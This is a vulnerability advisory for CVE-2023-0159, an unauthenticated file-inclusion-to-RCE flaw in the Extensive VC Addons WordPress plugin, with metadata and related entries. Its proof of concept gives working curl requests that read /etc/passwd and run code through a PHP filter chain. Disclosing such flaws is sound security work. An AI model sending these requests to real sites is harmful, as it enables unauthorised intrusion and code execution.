WordPress Plugin Vulnerabilities

Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE

Description

The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.

Thanks to Valentin Lobstein for reporting the escalation to RCE.

Proof of Concept

LFI:

curl 'https://example.com/wp-admin/admin-ajax.php' \
    -d 'action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=/etc/passwd'


RCE:

Using https://github.com/synacktiv/php_filter_chain_generator to generate the filter chain payload.

payload=`php_filter_chain_generator/php_filter_chain_generator.py --chain '<?php system("sleep 5"); ?>' | grep --color=never 'php://filter'`

time curl 'https://example.com/wp-admin/admin-ajax.php' \
    -d 'action=extensive_vc_init_shortcode_pagination&options[template]='$payload

Affects Plugins

Plugin icon
extensive-vc-addon
Fixed in 1.9.1

References

CVE
CVE-2023-0159

Classification

Type
RCE
OWASP top 10
A1: Injection
CWE
CWE-94
CVSS
10.0 (critical)

Miscellaneous

Original Researcher
dc11
Submitter
dc11
Verified
Yes
WPVDB ID
239ea870-66e5-4754-952e-74d4dd60b809

Timeline

Publicly Published
2023-01-25 (about 1 years ago)
Added
2023-01-23 (about 1 years ago)
Last Updated
2023-12-05 (about 5 months ago)

Other

Published
Title
Published
2024-03-13
Title
Multiple Page Generator Plugin – MPG < 3.4.1 - Authenticated (Editor+) Remote Code Execution
Published
2020-03-25
Title
Product Lister for Walmart <= 1.0.0 - Unauthenticated RCE via Outdated PHPUnit
Published
2022-07-25
Title
WP-DBManager < 2.80.8 - Admin+ Remote Command Execution
Published
2021-12-05
Title
Modal Window < 5.2.2 - RFI leading to RCE via CSRF
Published
2015-09-14
Title
EZ SQL Reports < 4.11.37 - Authenticated Arbitrary Code Execution